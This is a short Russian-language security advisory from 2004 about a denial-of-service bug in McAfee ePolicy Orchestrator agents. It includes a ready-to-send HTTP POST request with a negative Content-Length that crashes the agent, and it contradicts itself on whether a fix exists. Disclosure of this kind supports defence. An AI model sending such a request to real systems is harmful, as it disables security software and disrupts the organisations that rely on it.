Удаленный отказ в обслуживании против McAfee ePolicy Orchestrator

Дата публикации:
28.01.2004
Всего просмотров:
1513
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная сеть
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
McAfee ePolicy Orchestrator 2.x
McAfee ePolicy Orchestrator 3.x
Уязвимые версии: McAfee ePolicy Orchestrator

Описание: Уязвимость обнаружена в McAfee ePolicy Orchestrator. Удаленный пользователь может аварийно завершить работу агента.

Удаленный пользователь может представить отрицательное значение параметра Content-Length, чтобы вызвать переполнение буфера и аварийно завершить работу целевого агента.

 
POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0
Accept: application/octet-stream
Accept-Language: en-us
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows)
Host: KILL_EPO
Content-Length: -1
Connection: Keep-Alive

URL производителя: http://www.nai.com/us/products/mcafee/antivirus/fileserver/epo.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: CVE: CAN-2004-0095

или введите имя

CAPTCHA